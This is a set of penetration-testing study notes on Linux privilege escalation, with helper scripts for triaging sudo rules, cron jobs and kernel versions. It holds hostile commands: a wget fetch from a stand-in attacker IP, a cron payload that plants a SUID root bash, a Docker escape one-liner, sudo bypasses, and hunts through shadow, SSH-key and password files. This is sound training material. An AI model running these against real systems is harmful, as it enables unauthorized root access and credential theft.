Pentest_Notes

🐧 Privilege Escalation — Linux

Organized notes for Linux privilege escalation techniques. Last Updated: 2026-03-27


Overview

Linux privilege escalation involves going from a low-privileged user to root. The methodology is: enumerate everything, find misconfigurations, and exploit them.


Enumeration

Checklist

Quick History Check (Also Good for Attack Box)

# zsh: "history 0" prints the whole history; in bash the equivalent is plain "history"
history 0 | grep <command>
history | grep <command>

System Information

# Basic system info
hostname
uname -a
cat /etc/os-release
lscpu
uptime -p

# User activity
w
last
lastlog

# Currently logged-in users
who

LinPEAS

# Run with 5-minute timeout
timeout 5m ./linpeas.sh

# Transfer LinPEAS to target
# From attacker: python3 -m http.server 80
# On target: wget http://<ATTACKER_IP>/linpeas.sh && chmod +x linpeas.sh

⚠️ CPTS Exam Tip: Pay special attention to red text on a yellow background in LinPEAS output; LinPEAS's own legend flags those as "95% a PE vector". Plain red means "you should take a look at it".


Sudo Abuse

Checklist

# Check sudo privileges
sudo -l

# Attempt direct root shell
sudo -i
sudo su
sudo bash

# Check sudo version
sudo -V

🔗 Reference: GTFOBins — search for any binary found in sudo -l output.

Common Sudo Exploits

CVE                             Affected versions                                    Description
CVE-2021-3156 (Baron Samedit)   1.8.2 - 1.8.31p2 and 1.9.0 - 1.9.5p1                 Heap overflow via sudoedit -s; a vulnerable build answers "sudoedit -s /" with "not a regular file", a patched one with "usage:"
CVE-2019-14287                  < 1.8.28, needs an "(ALL, !root)" sudoers entry      sudo -u#-1 <cmd> runs as root
CVE-2019-18634                  < 1.8.26 with "pwfeedback" set in sudoers            Stack overflow in the password prompt (asterisk feedback)
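
Added example (not part of the original notes): a small triage of sudo -l output that flags the entries above plus NOPASSWD/SETENV/LD_PRELOAD. The sample output (user bob, host web01, the listed commands) is constructed for this example; on a target, pipe the real output through sudo_l_triage.

```sh
#!/bin/sh
# Added example: triage "sudo -l" output for the entries worth acting on.
# SAMPLE_SUDO_L is constructed for this example; on a target run:
#   sudo -l 2>/dev/null | sudo_l_triage

SAMPLE_SUDO_L='Matching Defaults entries for bob on web01:
    env_reset, env_keep+=LD_PRELOAD, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User bob may run the following commands on web01:
    (ALL, !root) /bin/bash
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: SETENV: /usr/local/bin/backup.sh'

# Reads sudo -l output on stdin and prints one finding per line.
# The last whitespace-separated field is taken as the command, so entries
# that carry arguments are reported by their final argument; eyeball those.
sudo_l_triage() {
    while IFS= read -r line; do
        case "$line" in
            *env_keep*LD_PRELOAD*)
                echo "LD_PRELOAD survives sudo: a root .so can be loaded by any allowed binary" ;;
        esac
        # Command-spec lines are the ones carrying a "(runas)" group
        case "$line" in
            *'('*')'*)
                cmd=${line##* }
                case "$line" in *'!root'*)
                    echo "(ALL, !root) on $cmd: try sudo -u#-1 $cmd (CVE-2019-14287, sudo < 1.8.28)" ;;
                esac
                case "$line" in *NOPASSWD:*)
                    echo "NOPASSWD on $cmd: no password needed, check it on GTFOBins" ;;
                esac
                case "$line" in *SETENV:*)
                    echo "SETENV on $cmd: caller-controlled environment (LD_PRELOAD, PATH)" ;;
                esac
                ;;
        esac
    done
    return 0
}

# Offline demo against the constructed sample.
triage_sample() {
    printf '%s\n' "$SAMPLE_SUDO_L" | sudo_l_triage
}

triage_sample
```

Against the sample this reports five findings: the kept LD_PRELOAD, the (ALL, !root) entry for /bin/bash, NOPASSWD on vim, and both NOPASSWD and SETENV on backup.sh. Pair the sudo version from sudo -V with the table before trying the CVE-2019-14287 bypass.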

SUID/SGID Binaries

# Find SUID files
find / -type f -perm /4000 2>/dev/null

# Find SGID files (-type f skips the many harmless setgid directories)
find / -type f -perm /2000 2>/dev/null

# Find both
find / -type f -perm /6000 2>/dev/null

🔗 Check each SUID binary on GTFOBins for exploitation techniques.


Capabilities

# Find files with capabilities
getcap -r / 2>/dev/null

Common exploitable capabilities

cap_setuid            change UID to 0 (e.g. a python binary with cap_setuid+ep: os.setuid(0) then spawn a shell)
cap_setgid            change GID, root group access
cap_dac_override      bypass file read/write/execute permission checks
cap_dac_read_search   bypass read/search checks: read /etc/shadow, root's SSH keys
cap_net_raw           raw sockets / sniffing; credential capture rather than a direct root shell
cap_sys_admin, cap_sys_ptrace, cap_chown, cap_fowner, cap_setfcap   also worth a GTFOBins lookup (mount, ptrace into root processes, take ownership of files, grant further caps)

Cron Jobs & Scheduled Tasks

# Current user cron jobs
crontab -l

# Root cron jobs (only works if sudo -l allows it)
sudo crontab -l

# System cron directories
ls -la /etc/cron.daily
ls -la /etc/cron.hourly
ls -la /etc/cron.weekly
ls -la /etc/cron.monthly
ls -la /etc/cron.d/

# System crontab
cat /etc/crontab

# Monitor for cron execution with pspy
timeout 20 ./pspy64

Cron Exploitation

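Added example (not part of the original notes): a script that reads a system crontab, reports jobs whose script or script directory is world-writable, flags commands given without an absolute path together with any world-writable directory on the crontab's PATH, and appends a payload to a writable script. The lab it builds (a mktemp directory, a fake crontab, backup.sh/rotate.sh/cleanup.sh) is constructed for the example; the rootbash payload path is an assumption. It assumes the /etc/crontab layout (five time fields, a user, then the command) and does not parse @reboot-style lines.

```sh
#!/bin/sh
# Added example: cron triage and injection against a constructed lab.
# On a target: cron_triage /etc/crontab, then each file in /etc/cron.d/.

is_world_writable() {
    # -perm -002 tests the other-write bit directly, so the verdict is the
    # same whether this runs as the low-privileged user or as root.
    [ -n "$(find "$1" -maxdepth 0 -perm -002 2>/dev/null)" ]
}

cron_triage() {
    cronfile=$1
    cron_path=$(grep '^PATH=' "$cronfile" | tail -n 1)
    cron_path=${cron_path#PATH=}
    # Skip comments, VAR=value assignments and blank lines.
    grep -Ev '^[[:space:]]*(#|[A-Za-z_]+=)' "$cronfile" | grep -v '^[[:space:]]*$' |
    while read -r min hr dom mon dow user cmdline; do
        cmd=${cmdline%% *}
        case "$cmd" in
            /*)
                is_world_writable "$cmd" && echo "WRITABLE $cmd runs as $user: append a payload"
                is_world_writable "$(dirname "$cmd")" && echo "WRITABLE-DIR $(dirname "$cmd"): replace $cmd"
                ;;
            *)
                echo "RELATIVE $cmd runs as $user, resolved via PATH=$cron_path"
                printf '%s\n' "$cron_path" | tr ':' '\n' | while read -r d; do
                    is_world_writable "$d" && echo "  PATH-HIJACK: drop a fake $cmd into $d"
                done
                ;;
        esac
    done
    return 0
}

# Append a payload to a writable script; the next cron run executes it as the
# job's user. The /tmp/rootbash location is an assumption for the example.
cron_inject() {
    printf '\ncp /bin/bash /tmp/rootbash && chmod u+s /tmp/rootbash\n' >> "$1"
}

# Constructed lab: two misconfigurations and one clean job.
setup_lab() {
    LAB=$(mktemp -d)
    mkdir -p "$LAB/opt/scripts" "$LAB/bin" "$LAB/sbin"
    chmod 755 "$LAB/opt/scripts" "$LAB/sbin"
    chmod 777 "$LAB/bin"                          # world-writable dir on cron's PATH
    printf '#!/bin/sh\ntar czf /tmp/backup.tgz /var/www\n' > "$LAB/opt/scripts/backup.sh"
    chmod 777 "$LAB/opt/scripts/backup.sh"        # world-writable script run by root
    printf '#!/bin/sh\necho rotate\n' > "$LAB/opt/scripts/rotate.sh"
    chmod 755 "$LAB/opt/scripts/rotate.sh"        # clean job, must not be reported
    printf 'PATH=%s/bin:%s/sbin\n* * * * * root %s/opt/scripts/backup.sh\n0 3 * * * root %s/opt/scripts/rotate.sh --quiet\n*/5 * * * * root cleanup.sh\n' \
        "$LAB" "$LAB" "$LAB" "$LAB" > "$LAB/crontab"
    echo "$LAB"
}

lab=$(setup_lab)
cron_triage "$lab/crontab"
rm -rf "$lab"
```

On the lab this prints three lines: the writable backup.sh, the relative cleanup.sh, and the PATH-hijack opportunity in the world-writable bin directory; rotate.sh stays silent. Confirm timing with pspy before relying on the injected line, and remove the payload afterwards.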

File Permissions & World-Writable Files

# World-writable directories (the explicit -print keeps the pruned /proc entry out of the output)
find / -path /proc -prune -o -type d -perm -o+w -print 2>/dev/null

# World-writable files
find / -path /proc -prune -o -type f -perm -o+w -print 2>/dev/null

# Files owned by current user
find / -user $(whoami) 2>/dev/null

# Recent files
find / -type f -mmin -60 2>/dev/null

Network & Internal Services

# Open ports / listening services
netstat -tuepn
netstat -tulpn
ss -tulpn

# Network interfaces
ip a
ifconfig

# Routes
ip route
route -n

# Firewall rules
iptables -L -n
cat /etc/iptables/rules.v4

# Listen on interface
sudo tcpdump -i eth0

# ARP table
arp -a

⚠️ CPTS Exam Tip: Internal services listening on localhost (127.0.0.1) may be exploitable — check for web services, databases, etc.


Process Monitoring

# List running processes
ps aux

# Process monitoring with pspy
timeout 20 ./pspy64

# Watch for processes
watch -n 1 'ps aux | grep -v "\[" | head -20'

Credential Hunting

# Check /etc/passwd and /etc/shadow (shadow is root-only by default; a readable shadow or a writable passwd is a finding in itself)
cat /etc/passwd
cat /etc/shadow

# Command history
cat ~/.bash_history
cat ~/.zsh_history

# Environment variables
env
cat ~/.bashrc
cat ~/.profile

# SSH keys (":1:" keeps only hits on line 1, i.e. the BEGIN header of a key file)
grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1:"
ls -la ~/.ssh/

# Search for password files
find / -name "*.txt" -o -name "*.cfg" -o -name "*.conf" -o -name "*.ini" -o -name "*.bak" 2>/dev/null | head -50

# Configuration files (grep -E so the "|" alternation is a real OR; quoted patterns so the shell does not glob them)
for l in ".conf" ".config" ".cnf"; do echo -e "\nFile extension: $l"; find / -name "*$l" 2>/dev/null | grep -Ev "lib|fonts|share|core"; done

# Credentials in config files
for i in $(find / -name "*.cnf" 2>/dev/null | grep -Ev "doc|lib"); do echo -e "\nFile: $i"; grep -i "user\|password\|pass" "$i" 2>/dev/null | grep -v "^#"; done

# Database files
for l in ".sql" ".db" ".*db" ".db*"; do echo -e "\nDB File extension: $l"; find / -name "*$l" 2>/dev/null | grep -Ev "doc|lib|headers|share|man"; done

# Text files and extension-less files in home directories (parentheses keep -type f applying to both branches)
find /home/* -type f \( -name "*.txt" -o ! -name "*.*" \) 2>/dev/null

# Git repositories
find / -type d -name ".git" 2>/dev/null

Docker / Container Escape

# Check if inside Docker (cgroup v1 shows "docker" here; on cgroup v2 the file may only show "0::/", so also check /.dockerenv)
grep docker /proc/1/cgroup
ls -la /.dockerenv

# Check Docker socket (a socket you can read and write is as good as docker group membership)
ls -la /var/run/docker.sock

# If Docker group member
docker images
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Kernel Exploits (Last Resort)

# Check kernel version
uname -r
cat /etc/os-release

# Search for kernel exploits
searchsploit linux kernel <version>

🔴 Warning: Kernel exploits can crash the system. Use as a last resort.

Exploit    Affected versions                                                                  CVE
DirtyPipe  kernel 5.8 up to the fix in 5.16.11 (also fixed in stable 5.15.25 and 5.10.102)   CVE-2022-0847
DirtyCow   kernel 2.6.22 up to the fix in 4.8.3                                               CVE-2016-5195
PwnKit     polkit's SUID pkexec, every release before the January 2022 fix (not a kernel bug; the kernel version is irrelevant)   CVE-2021-4034

Distro kernels backport fixes without changing the version string, so a version match is a lead to confirm (changelog, PoC in a snapshot), not proof.
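
Added example (not part of the original notes): a version check that strips the distro suffix from uname -r and tests the kernel ranges in the table above, including the 5.10.102 and 5.15.25 stable fixes that a plain "5.8 to 5.16.11" comparison gets wrong. It assumes GNU sort -V is available; PwnKit is left out because it does not depend on the kernel version.

```sh
#!/bin/sh
# Added example: map a kernel version string onto the DirtyCow/DirtyPipe ranges.
# Uses GNU sort -V (coreutils, assumed present) for version ordering.

version_lt() {   # true if $1 sorts strictly before $2
    [ "$1" != "$2" ] && [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$1" ]
}
version_ge() { ! version_lt "$1" "$2"; }
in_range() {     # $2 <= $1 < $3: lower bound inclusive, fix version exclusive
    version_ge "$1" "$2" && version_lt "$1" "$3"
}

# "5.10.0-21-amd64" -> "5.10.0": drop the distro suffix after '-' or '+'
kernel_base() {
    v=${1%%-*}
    printf '%s\n' "${v%%+*}"
}

# Prints the name of each exploit whose range contains the kernel.
kernel_exploit_candidates() {
    k=$(kernel_base "$1")
    # DirtyCow: 2.6.22 up to the fix in 4.8.3
    in_range "$k" 2.6.22 4.8.3 && echo DirtyCow
    # DirtyPipe: 5.8 up to the fix in 5.16.11, minus the 5.10.102+ and 5.15.25+ stable fixes
    if in_range "$k" 5.8 5.16.11 &&
       ! in_range "$k" 5.10.102 5.11 &&
       ! in_range "$k" 5.15.25 5.16; then
        echo DirtyPipe
    fi
    return 0
}

kernel_exploit_candidates "$(uname -r)"
```

A hit such as "5.15.0-91-generic" -> DirtyPipe is exactly the case the caveat above is about: Ubuntu's 5.15.0 series carries the backported fix, so treat the output as a list of things to verify, not to fire.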

Common Pitfalls / Gotchas

References & Further Reading